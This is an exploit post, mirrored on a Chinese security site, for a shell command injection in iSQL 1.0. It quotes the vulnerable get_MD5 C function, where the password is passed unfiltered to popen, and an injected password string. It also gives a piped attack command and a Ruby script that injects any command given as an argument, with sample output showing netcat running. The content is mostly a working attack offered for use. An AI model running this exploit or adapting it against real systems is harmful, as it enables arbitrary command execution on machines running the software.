首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 iSQL 1.0 - Shell Command Injection 来源：www.hahwul.com 作者：HaHwul 发布时间：2016-06-14   #!/bin/ruby # Exploit Title: iSQL(RL) 1.0 - Shell Command Injection # Date: 2016-06-13 # Exploit Author: HaHwul # Exploit Author Blog: www.hahwul.com # Vendor Homepage: https://github.com/roselone/iSQL # Software Link: https://github.com/roselone/iSQL/archive/master.zip # Version: 1.0 # Tested on: Debian [wheezy] # CVE : none     =begin ### Vulnerability Point  :: [isql_main.c 455 line] popen(cmd,"r"); code is vulnerable  :: don't filtering special characters in str value 446 char *get_MD5(char *str){ 447         FILE *stream; 448         char *buf=malloc(sizeof(char)*33); 449         char cmd[100]; 450         memset(buf,'\0',sizeof(buf)); 451         memset(cmd,'\0',sizeof(cmd)); 452         strcpy(cmd,"echo "); //5 453         strcpy((char *)cmd+5,str); 454         strcpy((char *)cmd+5+strlen(str)," | md5sum"); 455         stream=popen(cmd,"r"); 456         fread(buf,sizeof(char),32,stream); 457 //      printf("%s\n",buf); 458         return buf; 459 }   ### Vulnerability Triger 614          while (USER_NUM==-1){ 615                 printf(">username:"); 616                 scanf("%s",username); 617                 printf(">password:"); 618                 scanf("%s",passwd); 619                 md5=get_MD5(passwd);   ### Vulnerability Run >username:asdf;   >password:asdf;top;echo 1    (~) #> ps -aux | grep top root     13279  0.0  0.0   4472   860 pts/1    S+   13:33   0:00 sh -c echo asdf;top;echo | md5sum root     13280  0.3  0.0  26304  3200 pts/1    S+   13:33   0:00 top   =end   ### Attack command #> (sleep 5; echo -en 'aasdf\n';sleep 1;echo -en 'asdf;nc;echo 1';sleep 10) | ./isql   ### Ruby Code puts "SQL 1.0 - Shell Command Injection" puts "by hahwul" if(ARGV.size != 1)   puts "Usage: ruby iSQL_command_injection.rb [COMMAND]"   puts " need ./isql in same directory"   exit() else   puts "CMD :: "+ARGV[0]   puts "Run Injection.."   system("(sleep 5; echo -en 'aasdf\n';sleep 1;echo -en 'asdf;#{ARGV[0]};echo 1';sleep 10) | ./isql") end   ### Sample Output =begin #> ruby test.rb nc # Exploit Title: iSQL 1.0 Shell Command Injection by hahwul CMD :: nc Run Injection..   *************** welcome to ISQL **************** * version 1.0                                  * * Designed by RL                               * * Copyright (c) 2011, RL. All rights reserved  * ************************************************   >username:>password:verify failure , try again ! This is nc from the netcat-openbsd package. An alternative nc is available in the netcat-traditional package. usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]       [-P proxy_username] [-p source_port] [-q seconds] [-s source]       [-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]       [-x proxy_address[:port]] [destination] [port] >username:>password:verify failure , try again ! ^Ctest.rb:10:in `system': Interrupt     from test.rb:10:in `<main>' =end   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Zabbix 2.2 - 3.0.3 - RCE with ·iSQL 1.0 - isql_main.c Buffer ·Allwinner 3.4 Legacy Kernel Lo ·Apache Continuum Arbitrary Com ·OS X Kernel - Stack Buffer Ove ·Microsoft Internet Explorer 11 ·OS X/iOS Kernel - UAF Racing g ·Easy RM To MP3 Converter 2.7.3 ·OS X Kernel - Use-After-Free D ·Oracle Orakill.exe 11.2.0 - Bu ·OS X Kernel - OOB Read of Obje ·PHPLive 4.4.8 - 4.5.4 - Passwo   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved